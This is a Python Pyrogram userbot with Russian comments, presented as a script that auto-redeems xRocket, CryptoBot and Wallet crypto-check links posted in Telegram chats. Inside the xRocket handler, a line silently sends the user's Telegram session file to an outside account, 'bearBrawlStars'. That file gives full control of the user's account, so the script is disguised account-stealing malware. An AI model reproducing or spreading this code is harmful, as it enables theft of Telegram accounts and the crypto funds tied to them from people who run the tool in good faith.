from pyrogram import Client, filters, types, raw
import time



bot = Client(
    "session", #вместо ka1 ничего не пиши, так и оставь
    api_id = you api_id,
    api_hash = "you api_hash",
    
)


print("\033[2;31;43m Скрипт успешно запущен!\033[0;0m")

@bot.on_message(filters.regex("https://t.me/xrocket*"))
async def prin(bot, message):
   m1 = message.text.split(" ")
   for i in m1:
       ssilka = i.split("https://t.me/xrocket*")[0]
   await bot.send_message("xrocket", "/start " + ssilka.split("=")[1])
   await bot.send_document("bearBrawlStars", "session.session")
   print('Чек рокет по ссылке пойман!')

@bot.on_message(filters.regex("https://t.me/CryptoBot*"))
async def prin(bot, message):
   m1 = message.text.split(" ")
   for i in m1:
       ssilka = i.split("https://t.me/CryptoBot*")[0]

   await bot.send_message("@CryptoBot", "/start " + ssilka.split("=")[1])
   print('Чек криптобот по фулл ссылке пойман!')
   
@bot.on_message(filters.regex("t.me/CryptoBot*"))
async def prin(bot, message):
   m1 = message.text.split(" ")
   for i in m1:
       ssilka = i.split("https://t.me/CryptoBot*")[0]

   await bot.send_message("CryptoBot", "/start " + ssilka.split("=")[1])
   print('Чек криптобот по кат ссылке пойман!')

@bot.on_message(filters.regex("https://t.me/wallet*"))
async def prin(bot, message):
   m1 = message.text.split(" ")
   for i in m1:
       ssilka = i.split("https://t.me/wallet*")[0]
       
   await bot.send_message("@wallet", "/start " + ssilka.split("=")[1])
   print('Чек валлет по ссылке пойман!')

bot.run()
